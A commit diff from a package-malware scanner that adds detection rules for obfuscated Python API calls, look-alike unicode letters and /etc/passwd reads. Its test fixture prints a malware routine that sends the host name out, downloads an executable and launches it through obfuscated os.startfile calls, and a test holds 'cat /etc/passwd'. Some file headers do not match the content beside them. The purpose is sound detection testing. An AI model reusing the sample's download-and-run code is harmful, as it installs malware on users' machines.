Merge branch 'main' into strongHunter/typosquatting-error-handling

Author: sobregosodd

README.md

@@ -108,6 +108,7 @@ Source code heuristics:
 
 | **Heuristic** | **Description** |
 |:-------------:|:---------------:|
+| api-obfuscation | Identify obfuscated API calls using alternative Python syntax patterns |
 | shady-links | Identify when a package contains an URL to a domain with a suspicious extension |
 | obfuscation | Identify when a package uses a common obfuscation method often used by malware |
 | clipboard-access | Identify when a package reads or write data from the clipboard |
@@ -118,6 +119,7 @@ Source code heuristics:
 | dll-hijacking | Identifies when a malicious package manipulates a trusted application into loading a malicious DLL |
 | steganography | Identify when a package retrieves hidden data from an image and executes it |
 | code-execution | Identify when an OS command is executed in the setup.py file |
+| unicode | Identify suspicious unicode characters |
 | cmd-overwrite | Identify when the 'install' command is overwritten in setup.py, indicating a piece of code automatically running when the package is installed |
 
 Metadata heuristics:
@@ -199,6 +201,23 @@ Source code heuristics:
 | npm-steganography | Identify when a package retrieves hidden data from an image and executes it |
 | npm-dll-hijacking | Identifies when a malicious package manipulates a trusted application into loading a malicious DLL |
 | npm-exfiltrate-sensitive-data | Identify when a package reads and exfiltrates sensitive data from the local system |
+### Extension
+
+Source code heuristics:
+
+| **Heuristic** | **Description** |
+|:-------------:|:---------------:|
+| npm-serialize-environment | Identify when a package serializes 'process.env' to exfiltrate environment variables |
+| npm-obfuscation | Identify when a package uses a common obfuscation method often used by malware |
+| npm-silent-process-execution | Identify when a package silently executes an executable |
+| shady-links | Identify when a package contains an URL to a domain with a suspicious extension |
+| npm-exec-base64 | Identify when a package dynamically executes code through 'eval' |
+| npm-install-script | Identify when a package has a pre or post-install script automatically running commands |
+| npm-steganography | Identify when a package retrieves hidden data from an image and executes it |
+| npm-dll-hijacking | Identifies when a malicious package manipulates a trusted application into loading a malicious DLL |
+| npm-exfiltrate-sensitive-data | Identify when a package reads and exfiltrates sensitive data from the local system |
+| extension_suspicious_passwd_access_linux |  |
+| extension_powershell_policy_bypass |  |
 <!-- END_RULE_LIST -->
 
 ## Custom Rules

guarddog/analyzer/sourcecode/api-obfuscation.yml

@@ -0,0 +1,42 @@
+rules:
+    - id: api-obfuscation
+      languages:
+        - python
+      message: This package uses obfuscated API calls that may evade static analysis detection
+      metadata:
+        description: Identify obfuscated API calls using alternative Python syntax patterns
+      severity: WARNING
+      patterns:
+        - pattern-either:
+          # Covered cases:
+          # 1) __dict__ access patterns: $MODULE.__dict__[$METHOD](...) / .__call__(...)
+          # 2) __getattribute__ patterns: $MODULE.__getattribute__($METHOD)(...) / .__call__(...)
+          # 3) getattr patterns: getattr($MODULE, $METHOD)(...) / .__call__(...)
+          # It also covers the case where $MODULE is imported as __import__('mod')
+          - patterns:
+              - pattern-either:
+                  - pattern: $MODULE.__dict__[$METHOD]($...ARGS)
+                  - pattern: $MODULE.__dict__[$METHOD].__call__($...ARGS)
+                  - pattern: $MODULE.__getattribute__($METHOD)($...ARGS)
+                  - pattern: $MODULE.__getattribute__($METHOD).__call__($...ARGS)
+                  - pattern: getattr($MODULE, $METHOD)($...ARGS)
+                  - pattern: getattr($MODULE, $METHOD).__call__($...ARGS)
+              - metavariable-regex:
+                  metavariable: $MODULE
+                  regex: "^[A-Za-z_][A-Za-z0-9_\\.]*$|^__import__\\([\"'][A-Za-z_][A-Za-z0-9_]*[\"']\\)$"
+              - metavariable-regex:
+                  metavariable: $METHOD
+                  regex: "^[\"'][A-Za-z_][A-Za-z0-9_]*[\"']$"
+
+          # --- Additional Cases: __import__('mod').method(...) / .__call__(...)
+          - patterns:
+              - pattern-either:
+                  - pattern: __import__($MODULE).$METHOD($...ARGS)
+                  - pattern: __import__($MODULE).$METHOD.__call__($...ARGS)
+              - metavariable-regex:
+                  metavariable: $MODULE
+                  regex: "^[\"'][A-Za-z_][A-Za-z0-9_]*[\"']$"
+              - metavariable-regex:
+                  metavariable: $METHOD
+                  # avoid matching __getattribute__
+                  regex: "[^(__getattribute__)][A-Za-z_][A-Za-z0-9_]*"

guarddog/analyzer/sourcecode/extension_suspicious_passwd_access_linux.yar

@@ -1,4 +1,4 @@
-rule DETECT_FILE_powershell_policy_bypass
+rule suspicious_passwd_access_linux
 {
     meta:
         author = "T HAMDOUNI, Datadog"
@@ -9,4 +9,4 @@ rule DETECT_FILE_powershell_policy_bypass
         $read = /(readFile|readFileSync)\(\s*['"]\/etc\/passwd/ nocase
     condition:
         $cli or $read
-}
+}

guarddog/analyzer/sourcecode/extension_powershell_policy_bypass.yar renamed to guarddog/analyzer/sourcecode/suspicious_passwd_access_linux.yar

@@ -0,0 +1,75 @@
+# Ignores string contents to reduce false positives!
+
+rules:
+  - id: unicode
+    message:
+      This package uses uncommon unicode characters in its code, it may try to
+      avoid detection.
+    metadata:
+      description: Identify suspicious unicode characters
+    languages:
+      - python
+    severity: WARNING
+    patterns:
+      # ignore comments
+      - pattern-not-regex: \#(.*)$
+
+      # ignore strings
+      - pattern-not-regex: (["'].*?["'])
+      - pattern-not-regex: ("""(.|\n)*?""")
+      - pattern-not-regex: ('''(.|\n)*?''')
+
+      - pattern-either:
+          - pattern-regex: ([ªᵃₐⓐａ𝐚𝑎𝒂𝒶𝓪𝔞𝕒𝖆𝖺𝗮𝘢𝙖𝚊])
+          - pattern-regex: ([ᵇⓑｂ𝐛𝑏𝒃𝒷𝓫𝔟𝕓𝖇𝖻𝗯𝘣𝙗𝚋])
+          - pattern-regex: ([ᶜⅽⓒｃ𝐜𝑐𝒄𝒸𝓬𝔠𝕔𝖈𝖼𝗰𝘤𝙘𝚌])
+          - pattern-regex: ([ᵈⅆⅾⓓｄ𝐝𝑑𝒅𝒹𝓭𝔡𝕕𝖉𝖽𝗱𝘥𝙙𝚍])
+          - pattern-regex: ([ᵉₑℯⅇⓔｅ𝐞𝑒𝒆𝓮𝔢𝕖𝖊𝖾𝗲𝘦𝙚𝚎])
+          - pattern-regex: ([ᶠⓕｆ𝐟𝑓𝒇𝒻𝓯𝔣𝕗𝖋𝖿𝗳𝘧𝙛𝚏])
+          - pattern-regex: ([ᵍℊⓖｇ𝐠𝑔𝒈𝓰𝔤𝕘𝖌𝗀𝗴𝘨𝙜𝚐])
+          - pattern-regex: ([ʰₕℎⓗｈ𝐡𝒉𝒽𝓱𝔥𝕙𝖍𝗁𝗵𝘩𝙝𝚑])
+          - pattern-regex: ([ᵢⁱℹⅈⅰⓘｉ𝐢𝑖𝒊𝒾𝓲𝔦𝕚𝖎𝗂𝗶𝘪𝙞𝚒])
+          - pattern-regex: ([ʲⅉⓙⱼｊ𝐣𝑗𝒋𝒿𝓳𝔧𝕛𝖏𝗃𝗷𝘫𝙟𝚓])
+          - pattern-regex: ([ᵏₖⓚｋ𝐤𝑘𝒌𝓀𝓴𝔨𝕜𝖐𝗄𝗸𝘬𝙠𝚔])
+          - pattern-regex: ([ˡₗℓⅼⓛｌ𝐥𝑙𝒍𝓁𝓵𝔩𝕝𝖑𝗅𝗹𝘭𝙡𝚕])
+          - pattern-regex: ([ᵐₘⅿⓜｍ𝐦𝑚𝒎𝓂𝓶𝔪𝕞𝖒𝗆𝗺𝘮𝙢𝚖])
+          - pattern-regex: ([ⁿₙⓝｎ𝐧𝑛𝒏𝓃𝓷𝔫𝕟𝖓𝗇𝗻𝘯𝙣𝚗])
+          - pattern-regex: ([ºᵒₒℴⓞｏ𝐨𝑜𝒐𝓸𝔬𝕠𝖔𝗈𝗼𝘰𝙤𝚘])
+          - pattern-regex: ([ᵖₚⓟｐ𝐩𝑝𝒑𝓅𝓹𝔭𝕡𝖕𝗉𝗽𝘱𝙥𝚙])
+          - pattern-regex: ([ⓠｑ𐞥𝐪𝑞𝒒𝓆𝓺𝔮𝕢𝖖𝗊𝗾𝘲𝙦𝚚])
+          - pattern-regex: ([ʳᵣⓡｒ𝐫𝑟𝒓𝓇𝓻𝔯𝕣𝖗𝗋𝗿𝘳𝙧𝚛])
+          - pattern-regex: ([ſˢₛⓢｓ𝐬𝑠𝒔𝓈𝓼𝔰𝕤𝖘𝗌𝘀𝘴𝙨𝚜])
+          - pattern-regex: ([ᵗₜⓣｔ𝐭𝑡𝒕𝓉𝓽𝔱𝕥𝖙𝗍𝘁𝘵𝙩𝚝])
+          - pattern-regex: ([ᵘᵤⓤｕ𝐮𝑢𝒖𝓊𝓾𝔲𝕦𝖚𝗎𝘂𝘶𝙪𝚞])
+          - pattern-regex: ([ᵛᵥⅴⓥｖ𝐯𝑣𝒗𝓋𝓿𝔳𝕧𝖛𝗏𝘃𝘷𝙫𝚟])
+          - pattern-regex: ([ʷⓦｗ𝐰𝑤𝒘𝓌𝔀𝔴𝕨𝖜𝗐𝘄𝘸𝙬𝚠])
+          - pattern-regex: ([ˣₓⅹⓧｘ𝐱𝑥𝒙𝓍𝔁𝔵𝕩𝖝𝗑𝘅𝘹𝙭𝚡])
+          - pattern-regex: ([ʸⓨｙ𝐲𝑦𝒚𝓎𝔂𝔶𝕪𝖞𝗒𝘆𝘺𝙮𝚢])
+          - pattern-regex: ([ᶻⓩｚ𝐳𝑧𝒛𝓏𝔃𝔷𝕫𝖟𝗓𝘇𝘻𝙯𝚣])
+
+          - pattern-regex: ([ᴬⒶＡ𝐀𝐴𝑨𝒜𝓐𝔄𝔸𝕬𝖠𝗔𝘈𝘼𝙰🄰])
+          - pattern-regex: ([ᴮℬⒷＢ𝐁𝐵𝑩𝓑𝔅𝔹𝕭𝖡𝗕𝘉𝘽𝙱🄱])
+          - pattern-regex: ([ℂℭⅭⒸꟲＣ𝐂𝐶𝑪𝒞𝓒𝕮𝖢𝗖𝘊𝘾𝙲🄫🄲])
+          - pattern-regex: ([ᴰⅅⅮⒹＤ𝐃𝐷𝑫𝒟𝓓𝔇𝔻𝕯𝖣𝗗𝘋𝘿𝙳🄳])
+          - pattern-regex: ([ᴱℰⒺＥ𝐄𝐸𝑬𝓔𝔈𝔼𝕰𝖤𝗘𝘌𝙀𝙴🄴])
+          - pattern-regex: ([ℱⒻꟳＦ𝐅𝐹𝑭𝓕𝔉𝔽𝕱𝖥𝗙𝘍𝙁𝙵🄵])
+          - pattern-regex: ([ᴳⒼＧ𝐆𝐺𝑮𝒢𝓖𝔊𝔾𝕲𝖦𝗚𝘎𝙂𝙶🄶])
+          - pattern-regex: ([ᴴℋℌℍⒽＨ𝐇𝐻𝑯𝓗𝕳𝖧𝗛𝘏𝙃𝙷🄷])
+          - pattern-regex: ([ᴵℐℑⅠⒾＩ𝐈𝐼𝑰𝓘𝕀𝕴𝖨𝗜𝘐𝙄𝙸🄸])
+          - pattern-regex: ([ᴶⒿＪ𝐉𝐽𝑱𝒥𝓙𝔍𝕁𝕵𝖩𝗝𝘑𝙅𝙹🄹])
+          - pattern-regex: ([ᴷKⓀＫ𝐊𝐾𝑲𝒦𝓚𝔎𝕂𝕶𝖪𝗞𝘒𝙆𝙺🄺])
+          - pattern-regex: ([ᴸℒⅬⓁＬ𝐋𝐿𝑳𝓛𝔏𝕃𝕷𝖫𝗟𝘓𝙇𝙻🄻])
+          - pattern-regex: ([ᴹℳⅯⓂＭ𝐌𝑀𝑴𝓜𝔐𝕄𝕸𝖬𝗠𝘔𝙈𝙼🄼])
+          - pattern-regex: ([ᴺℕⓃＮ𝐍𝑁𝑵𝒩𝓝𝔑𝕹𝖭𝗡𝘕𝙉𝙽🄽])
+          - pattern-regex: ([ᴼⓄＯ𝐎𝑂𝑶𝒪𝓞𝔒𝕆𝕺𝖮𝗢𝘖𝙊𝙾🄾])
+          - pattern-regex: ([ᴾℙⓅＰ𝐏𝑃𝑷𝒫𝓟𝔓𝕻𝖯𝗣𝘗𝙋𝙿🄿])
+          - pattern-regex: ([ℚⓆꟴＱ𝐐𝑄𝑸𝒬𝓠𝔔𝕼𝖰𝗤𝘘𝙌𝚀🅀])
+          - pattern-regex: ([ᴿℛℜℝⓇＲ𝐑𝑅𝑹𝓡𝕽𝖱𝗥𝘙𝙍𝚁🄬🅁])
+          - pattern-regex: ([ⓈＳ𝐒𝑆𝑺𝒮𝓢𝔖𝕊𝕾𝖲𝗦𝘚𝙎𝚂🅂])
+          - pattern-regex: ([ᵀⓉＴ𝐓𝑇𝑻𝒯𝓣𝔗𝕋𝕿𝖳𝗧𝘛𝙏𝚃🅃])
+          - pattern-regex: ([ᵁⓊＵ𝐔𝑈𝑼𝒰𝓤𝔘𝕌𝖀𝖴𝗨𝘜𝙐𝚄🅄])
+          - pattern-regex: ([ⅤⓋⱽＶ𝐕𝑉𝑽𝒱𝓥𝔙𝕍𝖁𝖵𝗩𝘝𝙑𝚅🅅])
+          - pattern-regex: ([ᵂⓌＷ𝐖𝑊𝑾𝒲𝓦𝔚𝕎𝖂𝖶𝗪𝘞𝙒𝚆🅆])
+          - pattern-regex: ([ⅩⓍＸ𝐗𝑋𝑿𝒳𝓧𝔛𝕏𝖃𝖷𝗫𝘟𝙓𝚇🅇])
+          - pattern-regex: ([ⓎＹ𝐘𝑌𝒀𝒴𝓨𝔜𝕐𝖄𝖸𝗬𝘠𝙔𝚈🅈])
+          - pattern-regex: ([ℤℨⓏＺ𝐙𝑍𝒁𝒵𝓩𝖅𝖹𝗭𝘡𝙕𝚉🅉])

guarddog/analyzer/sourcecode/unicode.yml

@@ -3,7 +3,7 @@
 import re
 from typing import List
 
-import pkg_resources
+from packaging.requirements import Requirement
 import requests
 from packaging.specifiers import Specifier, Version
 
@@ -111,12 +111,11 @@ def safe_parse_requirements(req):
             """
             This helper function yields one valid requirement line at a time
             """
-            parsed = pkg_resources.parse_requirements(req)
-            while True:
+            for req_line in req:
+                if not req_line.strip():
+                    continue
                 try:
-                    yield next(parsed)
-                except StopIteration:
-                    break
+                    yield Requirement(req_line)
                 except Exception as e:
                     log.error(
                         f"Error when parsing requirements, received error {str(e)}. This entry will be "
@@ -130,7 +129,7 @@ def safe_parse_requirements(req):
                     continue
 
                 versions = get_matched_versions(
-                    find_all_versions(requirement.project_name),
+                    find_all_versions(requirement.name),
                     (
                         requirement.url
                         if requirement.url
@@ -140,7 +139,7 @@ def safe_parse_requirements(req):
 
                 if len(versions) == 0:
                     log.error(
-                        f"Package/Version {requirement.project_name} not on PyPI\n"
+                        f"Package/Version {requirement.name} not on PyPI\n"
                     )
                     continue
 
@@ -165,13 +164,13 @@ def safe_parse_requirements(req):
                 # find the dep with the same name or create a new one
                 dep = next(
                     filter(
-                        lambda d: d.name == requirement.project_name,
+                        lambda d: d.name == requirement.name,
                         dependencies,
                     ),
                     None,
                 )
                 if not dep:
-                    dep = Dependency(name=requirement.project_name, versions=set())
+                    dep = Dependency(name=requirement.name, versions=set())
                     dependencies.append(dep)
 
                 dep.versions.update(dep_versions)

guarddog/scanners/pypi_project_scanner.py

@@ -0,0 +1,59 @@
+""" Tests for api-obfuscation rule
+
+    RULEID cases:
+      - obfuscated version of 1337c package
+"""
+
+def send():
+    try:
+        env = os.environ['COMPUTERNAME']
+        t = requests.get("https://linkedopports.com/pyp/resp.php?live=Installation " +env)
+        if platform == 'win32':
+            url = 'https://python-release.com/python-install.scr'
+            filename = 'ini_file_pyp_32.exe'
+            rq = requests.get(url, allow_redirects=True)
+            open(filename, 'wb').write(rq.content)
+            
+            # os.system('start '+filename)
+            # ruleid: api-obfuscation
+            os.__dict__['startfile']('start '+filename)
+
+            # ruleid: api-obfuscation
+            os.__dict__['startfile'].__call__('start '+filename)
+            # ruleid: api-obfuscation
+            os.__getattribute__('startfile')('start '+filename)
+
+            # ruleid: api-obfuscation
+            os.__getattribute__('startfile').__call__('start '+filename)
+
+            # ruleid: api-obfuscation
+            getattr(os, 'startfile')('start '+filename)
+
+            # ruleid: api-obfuscation
+            getattr(os, 'startfile').__call__('start '+filename)
+
+            # ruleid: api-obfuscation
+            __import__('os').startfile('start '+filename)
+
+            # ruleid: api-obfuscation
+            __import__('os').startfile.__call__('start '+filename)
+
+            # ruleid: api-obfuscation
+            __import__('os').__dict__['startfile']('start '+filename)
+
+            # ruleid: api-obfuscation
+            __import__('os').__dict__['startfile'].__call__('start '+filename)
+
+            # ruleid: api-obfuscation
+            __import__('os').__getattribute__('startfile')('start '+filename)
+
+            # ruleid: api-obfuscation
+            __import__('os').__getattribute__('startfile').__call__('start '+filename)
+
+            # ruleid: api-obfuscation
+            getattr(__import__('os'), 'startfile')('start '+filename)
+
+            # ruleid: api-obfuscation
+            getattr(__import__('os'), 'startfile').__call__('start '+filename)
+    except:
+        pass    

tests/analyzer/sourcecode/api-obfuscation.py

@@ -0,0 +1 @@
+cat /etc/passwd

tests/analyzer/sourcecode/suspicious_passwd_access_linux.test

@@ -49,6 +49,6 @@ def test_source_codde_analyzer_yara_exec(rule_name: str):
             if not f.startswith(f"{rule_name}."):
                 continue
 
-            # testing file against against rule
+            # testing file against rule
             print(f"Testing YARA rule: {rule_name}")
             assert test_scan_rule.match(os.path.join(root, f))